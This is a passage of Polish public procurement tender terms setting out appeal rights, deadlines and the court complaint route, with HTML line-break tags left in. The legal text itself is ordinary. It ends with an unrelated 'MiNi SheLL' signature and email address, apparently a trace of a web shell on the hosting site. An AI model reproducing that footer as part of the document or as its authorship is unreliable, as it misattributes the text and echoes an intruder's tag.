została przekazana w sposób inny niż określony w lit. a.<br/>1.2. Odwołanie przysługuje na:<br/>1.2.1. Niezgodną z przepisami ustawy czynność Zamawiającego, podjętą w postępowaniu o<br/>udzielenie zamówienia, zawarcie umowy ramowej, dynamicznym systemie zakupów, systemie<br/>kwalifikowania wykonawców lub konkursie, w tym na projektowane postanowienia umowy’<br/>1.2.2. Zaniechanie czynności w postępowaniu o udzielenie zamówienia, o zawarcie umowy<br/>ramowej, dynamicznym systemie zakupów, systemie kwalifikowania wykonawców lub konkursie,<br/>do której zamawiający był obowiązany na podstawie umowy;<br/>1.2.3. Zaniechanie przeprowadzenia postępowania o udzielenie zamówienia lub zorganizowanie<br/>konkursu na podstawie ustawy, mimo że zamawiający był do tego obowiązany.<br/>2. Odwołujący przekazuje Zamawiającemu odwołanie wniesione w formie elektronicznej lub<br/>postaci elektronicznej albo kopię tego odwołania, jeżeli została ona wniesiona w formie<br/>pisemnej, przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać<br/>się z jego treścią przed upływem tego terminu.<br/>3. Domniemywa się, że Zamawiający mógł zapoznać się z treścią odwołania przed upływem<br/>terminu do jego wniesienia, jeżeli przekazanie odpowiednio odwołania albo jego kopii nastąpiło<br/>przed upływem terminu do jego wniesienia przy użyciu środków komunikacji elektronicznej.<br/>4. Odwołanie wobec treści ogłoszenia wszczynającego postępowanie o udzielenie zamówienia<br/>lub konkurs lub wobec treści dokumentów zamówienia wnosi się w terminie 5 dni od dnia<br/>zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub dokumentów zamówienia na<br/>stronie internetowej. 5. Odwołanie w przypadkach innych niż określone w punkcie 1.1 oraz 4<br/>wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności<br/>można było powziąć wiadomo o okolicznościach stanowiących podstawę jego wniesienia.<br/>6. Odwołanie, w przypadku gdy Zamawiający nie przesłał Wykonawcy zawiadomienie o wyborze<br/>najkorzystniejszej oferty, wnosi się nie później niż w terminie:<br/>6.1. 15 dni od dnia zamieszczenia w Biuletynie Zamówień Publicznych ogłoszenia o wyniku<br/>postępowania,<br/>6.2. Miesiąca od dnia zawarcia umowy, jeżeli Zamawiający nie zamieścił w biuletynie Zamówień<br/>Publicznych ogłoszenia o wyniku postępowania.<br/>7. Na orzeczenie Izby stronom oraz uczestnikom postępowania odwoławczego przysługuje<br/>skarga do sądu, którą wnosi się do Sądu Okręgowego w Warszawie – sądu zamówień<br/>publicznych, za pośrednictwem Prezesa Izby, w terminie 14 dni od dnia doręczenia orzeczenia<br/>Izby.

Creat By MiNi SheLL
Email: jattceo@gmail.com